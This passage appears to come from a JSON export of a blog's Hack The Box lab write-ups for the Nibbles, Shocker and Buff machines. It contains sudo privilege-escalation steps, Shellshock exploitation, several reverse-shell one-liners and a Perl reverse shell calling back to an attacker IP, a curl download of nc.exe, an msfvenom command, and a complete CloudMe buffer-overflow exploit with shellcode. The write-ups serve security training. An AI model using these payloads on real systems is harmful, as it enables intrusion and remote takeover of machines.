whoami\nnibbler\n$ env | grep TERM\n$ env\nAPACHE_RUN_DIR=/var/run/apache2\nAPACHE_PID_FILE=/var/run/apache2/apache2.pid\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nAPACHE_LOCK_DIR=/var/lock/apache2\nLANG=C\nAPACHE_RUN_USER=nibbler\nAPACHE_RUN_GROUP=nibbler\nAPACHE_LOG_DIR=/var/log/apache2\nPWD=/\n$ cd /home\n$ ls\nnibbler\n$ cd nibbler\n$ ls\npersonal.zip\nuser.txt\n$ cat user.txt\n962b.....e815\nPrivilege Escalation\npersonal.zip\nIn nibbler's /home we find a personal.zip file containing a vulnerable monitor.sh script that runs a command as root.\nmonitor.sh\nWe can run this file as root.\n$ sudo -l\nMatching Defaults entries for nibbler on Nibbles:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser nibbler may run the following commands on Nibbles:\n    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh\nSo it is enough to create a personal/stuff folder and put a monitor.sh script in it containing a cat /root/root.txt. We can then run it with sudo:\nnibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh\nnibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh\n4b0a.....a0b8\nroot shell\nFor more of a challenge, I open a shell as root. Actually, it was even easier than doing a cat...\n$ sudo ./monitor.sh\nnibbler@Nibbles:/home/nibbler/personal/stuff# echo \"/bin/bash\" > monitor.sh\nnibbler@Nibbles:/home/nibbler/personal/stuff# sudo ./monitor.sh\nroot@Nibbles:/home/nibbler/personal/stuff# whoami\nroot ","date":"2025-01-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/nibbles-htb/","title":"HTB | Nibbles"},{"content":" Machine name: Shocker | OS: Linux | IP: 10.10.10.56 | Difficulty: Easy\nEnumeration\nnmap\n┌──(kali㉿kali)-[~]\n└─$ nmap -sS -sC -sV -An -p- -vvv 10.10.10.56\nStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 05:02 EST\nPORT     STATE SERVICE REASON         VERSION\n80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Site doesn't have a title (text/html).\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n2222/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH\n|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=\n|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk\nNo exact OS matches for host (If you know what OS is running on it, see 
https://nmap.org/submit/ ).\nDirsearch & gobuster\nWith dirsearch we find the cgi-bin directory; access to it is \"forbidden\", but it exists.\ndirsearch -u http://shocker.htb\nv0.4.3\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\nOutput File: /home/kali/htb/shocker/reports/http_shocker.htb/_25-01-13_07-35-14.txt\nTarget: http://shocker.htb/\n[07:35:14] Starting:\n[07:35:18] 403 - 297B - /.ht_wsr.txt\n[07:35:18] 403 - 300B - /.htaccess.bak1\n[07:35:18] 403 - 300B - /.htaccess.orig\n[07:35:18] 403 - 302B - /.htaccess.sample\n[07:35:18] 403 - 300B - /.htaccess.save\n[07:35:18] 403 - 301B - /.htaccess_extra\n[07:35:18] 403 - 298B - /.htaccess_sc\n[07:35:18] 403 - 299B - /.htaccessOLD2\n[07:35:18] 403 - 298B - /.htaccessBAK\n[07:35:18] 403 - 300B - /.htaccess_orig\n[07:35:18] 403 - 290B - /.htm\n[07:35:18] 403 - 291B - /.html\n[07:35:18] 403 - 298B - /.htaccessOLD\n[07:35:18] 403 - 296B - /.htpasswds\n[07:35:18] 403 - 300B - /.htpasswd_test\n[07:35:18] 403 - 297B - /.httr-oauth\n[07:35:33] 403 - 294B - /cgi-bin/\n[07:35:56] 403 - 299B - /server-status\n[07:35:57] 403 - 300B - /server-status/\nTask Completed\nWe can try to find files inside it with gobuster and the -x option, which tests the whole wordlist with the specified extensions. 
Here we test the files in the cgi-bin directory with the extensions \"sh\", \"bin\" and \"cgi\".\n$ gobuster dir -u http://shocker.htb/cgi-bin -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sh,pl,bin,cgi\n===============================================================\nGobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http://shocker.htb/cgi-bin\n[+] Method: GET\n[+] Threads: 50\n[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster/3.6\n[+] Extensions: sh,bin,cgi\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n/user.sh (Status: 200) [Size: 118]\nProgress: 10557 / 882244 (1.20%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 11293 / 882244 (1.28%)\n===============================================================\nFinished\n===============================================================\nBingo! We find a user.sh script.\nFoothold\nShellshock\nThanks to the machine name \"shocker\" and a few web searches, we find the \"shellshock\" vulnerability, which allows arbitrary code execution through the files present in the cgi-bin directory. We find a GitHub repository that exploits it:\n$ python2 shocker.py --Host=shocker.htb --cgi /cgi-bin/user.sh --command whoami\nv1.1 Tom Watson, tom.watson@nccgroup.trust\nhttps://www.github.com/nccgroup/shocker\nReleased under the GNU Affero General Public License (https://www.gnu.org/licenses/agpl-3.0.html)\n[+] Single target '/cgi-bin/user.sh' being used\n[+] Checking connectivity with target...\n[+] Target was reachable\n[+] Looking for vulnerabilities on shocker.htb:80\n[+] 1 potential target found, attempting exploits\n[+] The following URLs appear to be exploitable:\n [1] http://shocker.htb:80/cgi-bin/user.sh\n[+] Would you like to exploit further?\n[>] Enter an URL number or 0 to exit: ls\n[+] The following URLs appear to be exploitable:\n [1] http://shocker.htb:80/cgi-bin/user.sh\n[+] Would you like to exploit further?\n[>] Enter an URL number or 0 to exit: 1\n[+] Entering interactive mode for http://shocker.htb:80/cgi-bin/user.sh\n[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'\n> whoami\n> No response\n> id\n> No response\n> /bin/id\n> No response\n> /bin/cat /etc/passwd\n< root:x:0:0:root:/root:/bin/bash\n< daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n< bin:x:2:2:bin:/bin:/usr/sbin/nologin\n< sys:x:3:3:sys:/dev:/usr/sbin/nologin\n< sync:x:4:65534:sync:/bin:/bin/sync\n< games:x:5:60:games:/usr/games:/usr/sbin/nologin\n< man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n< lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n< mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n< news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n< uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n< proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n< www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n< backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n< list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n< irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n< gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n< nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n< systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false\n< systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false\n< systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false\n< systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false\n< syslog:x:104:108::/home/syslog:/bin/false\n< _apt:x:105:65534::/nonexistent:/bin/false\n< lxd:x:106:65534::/var/lib/lxd/:/bin/false\n< messagebus:x:107:111::/var/run/dbus:/bin/false\n< uuidd:x:108:112::/run/uuidd:/bin/false\n< dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false\n< sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin 
< shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash\n> sh -i >& /dev/tcp/10.10.14.42/6666 0>&1\n> No response\n> sh -i >& /dev/tcp/10.10.14.42/6666 0>&1\n> No response\n> python3 --version\n> No response\n> python3 --version >& /dev/tcp/10.10.14.42/6666 0>&1\n> No response\n> python3 --version >& /dev/tcp/10.10.14.42/6666 0>&1\n> No response\n> nc 10.10.14.42 6666 -e sh\n> No response\n> locate nc\n> No response\n> /bin/cat /home/*/user.txt\n< c4bf.....3bf6\n>\nShell as shelly\n....\n> /bin/bash -i >& /dev/tcp/10.10.14.42/6666 0>&1\n> No response\n>\n--------------------------\n$ nc -lnvp 6666\nlistening on [any] 6666 ...\nconnect to [10.10.14.42] from (UNKNOWN) [10.10.10.56] 40886\nbash: no job control in this shell\nshelly@Shocker:/usr/lib/cgi-bin$ whoami\nwhoami\nshelly\nPrivilege Escalation\nEnumeration\nWe can run any perl script as root... So I grabbed a perl reverse shell and ran it.\nshelly@Shocker:/tmp$ sudo -l\nMatching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\nUser shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl\nPerl as root\nshelly@Shocker:/tmp$ cat root.pl\nuse Socket;$i=\"10.10.14.42\";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"sh -i\");};\nshelly@Shocker:/tmp$ sudo /usr/bin/perl root.pl\n------------------------------------------------------------\n$ nc -lnvp 1337\nlistening on [any] 1337 ...\nconnect to [10.10.14.42] from (UNKNOWN) [10.10.10.56] 59474\n## whoami\nroot\n## python3 -c \"import pty;pty.spawn('/bin/bash')\"\nroot@Shocker:/tmp# export TERM=xterm\nexport TERM=xterm\nroot@Shocker:/tmp# ^Z\nzsh: suspended nc -lnvp 1337\n┌──(kali㉿kali)-[~/htb/shocker/shocker]\n└─$ stty raw -echo; fg\n[1] + continued nc -lnvp 1337\nroot@Shocker:/tmp#\nroot@Shocker:/tmp# whoami\nroot\nroot@Shocker:/tmp# cd /root\nroot@Shocker:~# ls\nroot.txt\nroot@Shocker:~# cat root.txt\nadcd.....c16c\nBonus\nEnumeration\nshellshock vuln with nmap script\n┌──(kali㉿kali)-[~/htb/shocker]\n└─$ locate nse | grep shellshock\n/usr/share/nmap/scripts/http-shellshock.nse\n┌──(kali㉿kali)-[~/htb/shocker]\n└─$ cat /usr/share/nmap/scripts/http-shellshock.nse | grep nmap\n-- nmap -sV -p- --script http-shellshock <target>\n-- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n┌──(kali㉿kali)-[~/htb/shocker]\n└─$ nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls shocker.htb\nStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 08:33 EST\nNmap scan report for shocker.htb (10.10.10.56)\nHost is up (0.019s latency). 
PORT STATE SERVICE VERSION\n80/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n| http-shellshock:\n| VULNERABLE:\n| HTTP Shellshock vulnerability\n| State: VULNERABLE (Exploitable)\n| IDs: CVE:CVE-2014-6271\n| This web application might be affected by the vulnerability known\n| as Shellshock. It seems the server is executing commands injected\n| via malicious HTTP headers.\n|\n| Disclosure date: 2014-09-24\n| Exploit results:\n| <!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n| <html><head>\n| <title>500 Internal Server Error</title>\n| </head><body>\n| <h1>Internal Server Error</h1>\n| <p>The server encountered an internal error or\n| misconfiguration and was unable to complete\n| your request.</p>\n| <p>Please contact the server administrator at\n| webmaster@localhost to inform them of the time this error occurred,\n| and the actions you performed just before this error.</p>\n| <p>More information about this error may be available\n| in the server error log.</p>\n| <hr>\n| <address>Apache/2.4.18 (Ubuntu) Server at shocker.htb Port 80</address>\n| </body></html>\n|\n| References:\n| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n| http://seclists.org/oss-sec/2014/q3/685\n| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271\n|_ http://www.openwall.com/lists/oss-security/2014/09/24/10\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds ","date":"2025-01-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/shocker-htb/","title":"HTB | Shocker"},{"content":" Machine name: Buff, OS: Windows, IP: 10.10.10.198, Difficulty: Easy\nIP\n10.10.10.198\nEnumeration\nnmap\n$ nmap -sS -sV -An -p- -vvv -T4 10.10.10.198\nPORT STATE SERVICE REASON VERSION\n7680/tcp open pando-pub? syn-ack ttl 127\n8080/tcp open http syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)\n| http-open-proxy: Potentially OPEN proxy.\n|_Methods supported:CONNECTION\n|_http-title: mrb3n's Bro Hut\n| http-methods:\n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6\nFoothold\nDirectory enumeration: buff.htb - port 8080\n$ gobuster dir -u http://buff.htb:8080/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n===============================================================\nGobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http://buff.htb:8080/\n[+] Method: GET\n[+] Threads: 50\n[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster/3.6\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n/profile (Status: 301) [Size: 337] [--> http://buff.htb:8080/profile/]\n/img (Status: 301) [Size: 333] [--> http://buff.htb:8080/img/]\n/upload (Status: 301) [Size: 336] [--> http://buff.htb:8080/upload/]\n/license (Status: 200) [Size: 18025]\n/include (Status: 301) [Size: 337] [--> http://buff.htb:8080/include/]\n/examples (Status: 503) [Size: 1054]\n/licenses (Status: 403) [Size: 1199]\n/Profile (Status: 301) [Size: 337] [--> http://buff.htb:8080/Profile/]\n/LICENSE (Status: 200) [Size: 18025]\n/att (Status: 301) [Size: 333] [--> http://buff.htb:8080/att/]\n/%20 (Status: 403) [Size: 1040]\n/IMG (Status: 301) [Size: 333] [--> http://buff.htb:8080/IMG/]\n/License (Status: 200) [Size: 18025]\n/ex (Status: 301) [Size: 332] [--> http://buff.htb:8080/ex/]\n/*checkout* (Status: 403) [Size: 1040]\n/Img (Status: 301) [Size: 333] [--> http://buff.htb:8080/Img/]\n/boot (Status: 301) [Size: 334] [--> http://buff.htb:8080/boot/]\n/Upload (Status: 301) [Size: 336] [--> http://buff.htb:8080/Upload/]\n/phpmyadmin (Status: 403) [Size: 1199]\n/webalizer (Status: 403) [Size: 1040]\n/*docroot* (Status: 403) [Size: 1040]\n/* (Status: 403) [Size: 1040]\n/con (Status: 403) [Size: 1040]\n/Include (Status: 301) [Size: 337] [--> http://buff.htb:8080/Include/]\n/http%3A (Status: 403) [Size: 1040]\n/**http%3a (Status: 403) [Size: 1040]\n/*http%3A (Status: 403) [Size: 1040]\n/aux (Status: 403) [Size: 1040]\n/Boot (Status: 301) [Size: 334] [--> http://buff.htb:8080/Boot/]\n/**http%3A (Status: 403) [Size: 1040]\n/%C0 (Status: 403) [Size: 1040]\n/server-status (Status: 403) [Size: 1199]\n/%3FRID%3D2671 (Status: 403) [Size: 1040]\n/devinmoore* (Status: 403) [Size: 1040]\n/Ex (Status: 301) [Size: 332] [--> http://buff.htb:8080/Ex/]\n... 
/ex is interesting: it leaks information through a mysqli error!\nWarning: mysqli::__construct(): (HY000/1049): Unknown database 'secure_login' in C:\\xampp\\htdocs\\gym\\ex\\include\\db_connect.php on line 3\nGym Management System 1.0 - Unauthenticated RCE\nSearching for \"Gym\" in searchsploit or on the web quickly turns up a python exploit that uploads a php file and runs any command.\n$ python3 exploit2.py http://buff.htb:8080/\n/home/kali/htb/Buff/exploit2.py:77: SyntaxWarning: invalid escape sequence '\\/'\n SIG += BL+' \\/'+RS+'\\n'\n[+] Successfully connected to webshell.\nC:\\xampp\\htdocs\\gym\\upload> powershell cat ../../../../Users/shaun/Desktop/user.txt\nPNG\n▒\nb6a5....ce0d3\nStabilize shell\n$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...\n10.10.10.198 - - [07/Jan/2025 17:07:08] \"GET /nc.exe HTTP/1.1\" 200 -\n--------------------------------------------------------------\n# RCE from website\nC:\\xampp\\htdocs\\gym\\upload> curl -O http://10.10.14.42:8888/nc.exe\nC:\\xampp\\htdocs\\gym\\upload> nc.exe 10.10.14.42 1337 -e cmd.exe\n--------------------------------------------------------------\n$ nc -lvnp 1337\nlistening on [any] 1337 ...\nconnect to [10.10.14.42] from (UNKNOWN) [10.10.10.198] 50531\nMicrosoft Windows [Version 10.0.17134.1610]\n(c) 2018 Microsoft Corporation. All rights reserved.\nC:\\xampp\\htdocs\\gym\\upload>whoami\nwhoami\nbuff\\shaun\nC:\\xampp\\htdocs\\gym\\upload>powershell\npowershell\nWindows PowerShell\nCopyright (C) Microsoft Corporation. All rights reserved. 
PS C:\\xampp\\htdocs\\gym\\upload>\nPrivilege escalation\nCloudMe_1112.exe\nDigging through the files, we find an executable, CloudMe_1112.exe. It turns out that this version listens on port 8888 by default when run, which is indeed the case on our machine.\nPS C:\\xampp\\htdocs\\gym\\upload> tasklist | findstr Cloud\ntasklist | findstr Cloud\nCloudMe.exe 284 0 18,048 K\nPS C:\\xampp\\htdocs\\gym\\upload> netstat -ano | findstr LISTENING\nnetstat -ano | findstr LISTENING\nTCP 0.0.0.0:135 0.0.0.0:0 LISTENING 944\nTCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4\nTCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6188\nTCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 7832\nTCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 8820\nTCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 524\nTCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1064\nTCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1644\nTCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2248\nTCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668\nTCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 684\nTCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4\nTCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8936\nTCP [::]:135 [::]:0 LISTENING 944\nTCP [::]:445 [::]:0 LISTENING 4\nTCP [::]:7680 [::]:0 LISTENING 7832\nTCP [::]:8080 [::]:0 LISTENING 8820\nTCP [::]:49664 [::]:0 LISTENING 524\nTCP [::]:49665 [::]:0 LISTENING 1064\nTCP [::]:49666 [::]:0 LISTENING 1644\nTCP [::]:49667 [::]:0 LISTENING 2248\nTCP [::]:49668 [::]:0 LISTENING 668\nTCP [::]:49669 [::]:0 LISTENING 684\nCloudMe 1.11.2 - Buffer Overflow\n$ searchsploit cloudme\n---------------------------------------------------------------- ---------------------------------\n Exploit Title | Path\n---------------------------------------------------------------- ---------------------------------\nCloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py <----------------------\nCloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt\nCloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py\nCloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb\nCloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py\nCloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb\nCloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py\nCloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py\nCloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py\nCloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py\nCloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py\n---------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\nThe python file contains a payload generated with msfvenom, but it does not work against our Windows 10 x64 victim. So we generated a new payload and then replaced that code in the python script.\nmsfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=9001 -b '\\x00\\x0A\\x0D' -f python\n...\n... 
$ cat exploit_cloudme.py\n# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)\n# Date: 2020-04-27\n# Exploit Author: Andy Bowden\n# Vendor Homepage: https://www.cloudme.com/en\n# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe\n# Version: CloudMe 1.11.2\n# Tested on: Windows 10 x86\n# Instructions:\n# Start the CloudMe service and run the script.\nimport socket\n\ntarget = \"127.0.0.1\"\n\n# Filler up to the saved return address, then the overwritten EIP,\n# a NOP sled and the msfvenom payload generated above.\npadding1 = b\"\\x90\" * 1052\nEIP = b\"\\xB5\\x42\\xA8\\x68\" # 0x68A842B5 -> PUSH ESP, RET\nNOPS = b\"\\x90\" * 30\n\nbuf = b\"\"\nbuf += b\"\\xbb\\x9b\\xa8\\x51\\x15\\xdb\\xd1\\xd9\\x74\\x24\\xf4\\x5e\"\nbuf += b\"\\x2b\\xc9\\xb1\\x52\\x31\\x5e\\x12\\x83\\xc6\\x04\\x03\\xc5\"\nbuf += b\"\\xa6\\xb3\\xe0\\x05\\x5e\\xb1\\x0b\\xf5\\x9f\\xd6\\x82\\x10\"\nbuf += b\"\\xae\\xd6\\xf1\\x51\\x81\\xe6\\x72\\x37\\x2e\\x8c\\xd7\\xa3\"\nbuf += b\"\\xa5\\xe0\\xff\\xc4\\x0e\\x4e\\x26\\xeb\\x8f\\xe3\\x1a\\x6a\"\nbuf += b\"\\x0c\\xfe\\x4e\\x4c\\x2d\\x31\\x83\\x8d\\x6a\\x2c\\x6e\\xdf\"\nbuf += b\"\\x23\\x3a\\xdd\\xcf\\x40\\x76\\xde\\x64\\x1a\\x96\\x66\\x99\"\nbuf += b\"\\xeb\\x99\\x47\\x0c\\x67\\xc0\\x47\\xaf\\xa4\\x78\\xce\\xb7\"\nbuf += b\"\\xa9\\x45\\x98\\x4c\\x19\\x31\\x1b\\x84\\x53\\xba\\xb0\\xe9\"\nbuf += b\"\\x5b\\x49\\xc8\\x2e\\x5b\\xb2\\xbf\\x46\\x9f\\x4f\\xb8\\x9d\"\nbuf += b\"\\xdd\\x8b\\x4d\\x05\\x45\\x5f\\xf5\\xe1\\x77\\x8c\\x60\\x62\"\nbuf += b\"\\x7b\\x79\\xe6\\x2c\\x98\\x7c\\x2b\\x47\\xa4\\xf5\\xca\\x87\"\nbuf += b\"\\x2c\\x4d\\xe9\\x03\\x74\\x15\\x90\\x12\\xd0\\xf8\\xad\\x44\"\nbuf += b\"\\xbb\\xa5\\x0b\\x0f\\x56\\xb1\\x21\\x52\\x3f\\x76\\x08\\x6c\"\nbuf += b\"\\xbf\\x10\\x1b\\x1f\\x8d\\xbf\\xb7\\xb7\\xbd\\x48\\x1e\\x40\"\nbuf += b\"\\xc1\\x62\\xe6\\xde\\x3c\\x8d\\x17\\xf7\\xfa\\xd9\\x47\\x6f\"\nbuf += b\"\\x2a\\x62\\x0c\\x6f\\xd3\\xb7\\x83\\x3f\\x7b\\x68\\x64\\xef\"\nbuf += b\"\\x3b\\xd8\\x0c\\xe5\\xb3\\x07\\x2c\\x06\\x1e\\x20\\xc7\\xfd\"\nbuf += b\"\\xc9\\x45\\x12\\xf3\\x23\\x32\\x20\\x0b\\x17\\xeb\\xad\\xed\"\nbuf += b\"\\x3d\\xfb\\xfb\\xa6\\xa9\\x62\\xa6\\x3c\\x4b\\x6a\\x7c\\x39\"\nbuf += b\"\\x4b\\xe0\\x73\\xbe\\x02\\x01\\xf9\\xac\\xf3\\xe1\\xb4\\x8e\"\nbuf += b\"\\x52\\xfd\\x62\\xa6\\x39\\x6c\\xe9\\x36\\x37\\x8d\\xa6\\x61\"\nbuf += b\"\\x10\\x63\\xbf\\xe7\\x8c\\xda\\x69\\x15\\x4d\\xba\\x52\\x9d\"\nbuf += b\"\\x8a\\x7f\\x5c\\x1c\\x5e\\x3b\\x7a\\x0e\\xa6\\xc4\\xc6\\x7a\"\nbuf += b\"\\x76\\x93\\x90\\xd4\\x30\\x4d\\x53\\x8e\\xea\\x22\\x3d\\x46\"\nbuf += b\"\\x6a\\x09\\xfe\\x10\\x73\\x44\\x88\\xfc\\xc2\\x31\\xcd\\x03\"\nbuf += b\"\\xea\\xd5\\xd9\\x7c\\x16\\x46\\x25\\x57\\x92\\x76\\x6c\\xf5\"\nbuf += b\"\\xb3\\x1e\\x29\\x6c\\x86\\x42\\xca\\x5b\\xc5\\x7a\\x49\\x69\"\nbuf += b\"\\xb6\\x78\\x51\\x18\\xb3\\xc5\\xd5\\xf1\\xc9\\x56\\xb0\\xf5\"\nbuf += b\"\\x7e\\x56\\x91\"\n\npayload = buf\n# Pad the whole buffer to a fixed 1500 bytes.\noverrun = b\"C\" * (1500 - len(padding1 + NOPS + EIP + payload))\nbuf = padding1 + EIP + NOPS + payload + overrun\n\ntry:\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((target, 8888))\n    s.send(buf)\nexcept Exception as e:\n    # The original printed sys.exc_value, which only exists in Python 2;\n    # printing the caught exception works on Python 3.\n    print(e)\nChisel - port forwarding (8888)\nSetting up chisel to duplicate port 8888 of the target machine on the local machine. 
Indeed, this port is normally reachable only from the target machine itself. But to exploit our vuln with the python script, the port has to be reachable from our local machine, which does have python.\nkali@kali:~/htb/Buff$ ./chisel server -p 1082 --reverse\n2025/01/10 20:17:44 server: Reverse tunnelling enabled\n2025/01/10 20:17:44 server: Fingerprint iiSKQuGUrbyvUjt5afbcmjecM6T6JHMCaV2+4LBLk3g=\n2025/01/10 20:17:44 server: Listening on http://0.0.0.0:1082\n2025/01/10 20:19:07 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening\n-------------------------------------------------------------------------\n# Windows target\nPS C:\\xampp\\htdocs\\gym\\upload> .\\chisel.exe client 10.10.14.42:1082 R:8888:localhost:8888\n.\\chisel.exe client 10.10.14.42:1082 R:8888:localhost:8888\n2025/01/11 01:19:06 client: Connecting to ws://10.10.14.42:1082\n2025/01/11 01:19:07 client: Connected (Latency 22.8931ms)\nExploitation (root.txt)\nFinally, we run the final exploit and get a shell as root on the Windows machine:\n┌──(kali㉿kali)-[~/htb/Buff]\n└─$ python3 exploit_cloudme.py\n┌──(kali㉿kali)-[~/htb/Buff]\n└─$ python3 exploit_cloudme.py\n┌──(kali㉿kali)-[~/htb/Buff]\n└─$ python3 exploit_cloudme.py\n--------------------------------------------------\n$ nc -lnvp 9001\nlistening on [any] 9001 ...\nconnect to [10.10.14.42] from (UNKNOWN) [10.10.10.198] 49685\nMicrosoft Windows [Version 10.0.17134.1610]\n(c) 2018 Microsoft Corporation. All rights reserved. 
